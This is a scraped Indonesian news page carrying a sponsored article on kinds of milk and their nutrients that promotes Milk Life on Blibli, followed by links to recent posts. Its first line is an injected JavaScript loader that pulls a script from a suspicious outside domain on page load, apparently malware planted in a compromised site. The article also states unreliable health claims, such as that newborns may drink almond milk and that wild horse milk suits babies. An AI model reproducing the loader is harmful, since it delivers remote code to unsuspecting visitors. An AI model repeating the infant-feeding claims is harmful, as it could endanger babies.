(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kesehatan

Ragam Jenis Susu Serta Kandungan Nutrisinya


KANALKALIMANTAN.COM – Sejak dari bayi, manusia sudah mengenal susu. Bahkan orang dewasa dan lanjut usia juga disarankan untuk minum susu dengan rutin. Ternyata ada pengelompokan tipe susu yang harus dikenali, karena setiap usia mengkonsumsi susu yang berbeda.

Pengelompokkan ini bukan berdasarkan warna atau rasanya saja tetapi juga dari segi kandungan nutrisinya. Jadi, bisa mengenali apa saja jenis susu sesuai dengan kandungan nutrisinya sehingga tepat dalam mengkonsumsinya.

Mengenal Jenis-Jenis Susu dan Nutrisinya

Pengertian dan pengelompokan tipe susu juga bisa dilihat dari cara pembuatannya. Ada empat jenis susu yang beredar yaitu susu UHT, susu murni, susu SKM, susu evaporasi. Susu Ultra High Temperature atau UHT adalah susu yang diproses menggunakan suhu tinggi sampai 135 derajat Celcius.

 

 

Usai diproses, susu akan dikemas dalam kaleng atau karton yang sudah di-steril. Tersedia macam-macam susu UHT berdasarkan rasa dan merknya. Sedangkan susu murni adalah jenis susu murni hasil dari perahan sapi.

Baca juga : Seni Budaya Tradisional Lebih Dikenalkan ke Anak Muda

Ketiga adalah susu SKM atau Susu Kental Manis yang merupakan hasil perahan sapi kemudian diuapkan di waktu yang lama. Proses evaporasi inilah yang membuat kandungan air dalam susu berkurang.

Keempat, susu evaporasi ini mirip dengan SKM hanya saja pada prosesnya tidak ditambahkan dengan gula. Biasanya lebih sering dipilih sebagai susu untuk diet.
Berbeda dari pengelompokan tipe susu dari cara pembuatannya, susu berdasarkan kandungan nutrisi lebih banyak jenisnya. Apa saja?

Susu Sapi
Tipe yang pertama ini adalah yang paling banyak disukai selain itu kandungan nutrisinya jauh lebih banyak bahkan dua kali lipat dari jenis lainnya. Ada dua susu sapi yang tersedia yaitu jenis whole atau lengkap.

Tipe whole ini kandungannya lebih banyak kalori dan lemak. Jenis yang kedua adalah susu skim yang lemak dan kalorinya lebih sedikit. Oleh karena itu dibandingkan susu sapi whole, susu skim lebih sering dipilih ketika diet.

Biasanya susu sapi ini lebih sering diminum langsung setelah dimasak atau dibuat susu UHT. Salah satu merk susu UHT yang banyak beredar di pasaran seperti susu milk life dengan varian rasa seperti vanilla, strawberry, coklat, dan plain.

Baca juga : Grand Launching RSI Sultan Agung Banjarbaru di Kota Citra Graha

Susu Kedelai
Selain susu hewan, ada juga susu yang berasal dari bahan nabati yaitu kedelai. Kandungan nutrisinya terkenal tanpa kolesterol dan lemak tidak jenuh. Selain itu kandungan protein dan kalsiumnya cukup tinggi.

Proses pembuatannya berasal dari pemerasan kedelai yang sudah digiling. Dari segi rasa memang sedikit hambar namun sangat baik untuk mempercepat penyerapan kalsium oleh tubuh.

Susu kedelai juga bagus untuk menurunkan konsentrasi trigliserida darah dan meningkatkan lipoprotein densitas tinggi. Jika sedang diet, selain susu skim dari sapi, susu kedelai bagus dikonsumsi.

Susu Almond
Sama seperti susu kedelai yang berasal dari kacang-kacangan, susu almond ini memiliki kandungan vitamin, mineral dan lemak tinggi. Sangat baik dikonsumsi jika Anda memiliki alerg terhadap laktosa.

Baca juga : Tinggal Seorang Diri, Kakek di Kelayan B Ditemukan Tak Bernyawa Membiru

Kandungan protein sangat rendah dibandingkan jenis-jenis susu hewan namun bagi Anda yang alergi dengan kacang-kacangan sebaiknya tidak mengkonsumsinya. Anda yang memiliki masalah kekurangan vitamin B juga sebaiknya tidak minum susu almond.

Walaupun memiliki kekurangan tersebut, namun kandungan nutrisi vitamin E nya sangat tinggi. Susu almond juga mengandung asam lemak omega 3 yang tinggi. Tidak heran, bayi yang baru lahir boleh mengkonsumsinya.

Susu Kambing
Selain sapi, jenis susu hewan lain yang juga banyak beredar adalah susu kambing. Berbeda dengan susu sapi yang cukup sulit dicerna, susu kambing memiliki molekul protein khusus yang membuatnya aman untuk pencernaan.

Nutrisinya sendiri kaya akan protein, vitamin A dan juga kalium yang semuanya bagus untuk tubuh setiap hari. Hanya saja rasa dari susu kambing yang asin manis ini tidak terlalu banyak disukai.

Perlu diperhatikan juga bahwa susu kambing memiliki kandungan laktosa tinggi seperti susu sapi. Jadi jika Anda kurang cocok dengan laktosa pada pencernaan, sebaiknya pilih jenis susu yang lain.

Baca juga : Sempat Level 3, Balangan Kembali ke Status PPKM Level 1

Susu Kerbau
Susu kambing dan susu kerbau lebih banyak dikonsumsi oleh masyarakat di wilayah Indonesia Timur. Dibandingkan susu sapi, susu kerbau memiliki kandungan lemak dua kali lipat banyaknya.

Susu kerbau bahkan memiliki kandungan kalori, protein, karbohidrat, laktosa, lemak dan kalsium yang lebih banyak dari susu sapi. Bedanya, susu kerbau justru jauh lebih awet ketika disimpan.

Susu Kuda Liar
Satu lagi susu hewan yang juga sering dikonsumsi yaitu susu kuda liar. Kandungan nutrisinya adalah asam lemak omega 3 dan 6, berbagai macam vitamin dan antioksidan.

Berdasarkan kandungan nutrisinya tersebut, susu kuda liar sangat baik untuk menjaga stamina tubuh. Selain itu kandungannya mirip dengan Air Susu Ibu (ASI). Susu kuda liar bisa menjadi selingan untuk konsumsi bayi.

Baca juga : Melatih Kaum Perempuan Desa Pulau Tambak Bikin Usaha Baru 

Susu Beras
Bagi Anda yang kurang cocok dengan susu hewan, maka alternatif lainnya adalah susu beras. Susu ini justru mengandung karbohidrat yang tinggi dibandingkan susu sapi. Selain itu tidak ada kandungan kolesterol jadi baik untuk jantung.

Nutrisi yang terkandung di dalamnya antara lain serta, gula, protein yang jumlahnya cukup tinggi. Susu ini juga sangat baik untuk perawatan kulit.

Mengkonsumsi susu yang sesuai kebutuhan ini bisa dilihat dari kandungan nutrisinya. Namun di antara semua pengelompokan ini, susu sapi yang diolah menjadi susu UHT adalah yang paling mudah dibeli dan aman.
Salah satunya adalah susu milk life varian UHT yang memiliki kandungan kalsium, fosfor, vitamin B2, A, D, E. Selain varian susu UHT, Milk Life juga menyediakan susu murni, coklat dan laktosa free.

Semua varian Milk Life ini bisa langsung Anda dapatkan di Blibli. Apalagi jika Anda membeli di Blibli sekarang sedang ada promo mendapatkan free cooler bag special dan free tumbler.

Jadi dari pengelompokan tipe susu ini, mana saja susu yang sudah dan belum Anda konsumsi? Jangan lupa untuk langsung membelinya di Blibli sekarang juga. (kanalkalimantan.com/al)

Reporter : al
Editor : kk


Desy Arfianty

Recent Posts

Ibu Ruli Terima Kursi Roda Bantuan Polsek Banjarbaru Utara

KANALKALIMANTAN.COM, BANJARBARU - Bentuk kepedulian terhadap masyarakat, Unit Binmas Polsek Banjarbaru Utara memberikan bantuan sebuah… Read More

1 jam ago

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

3 jam ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

4 jam ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

4 jam ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

18 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

18 jam ago

This website uses cookies.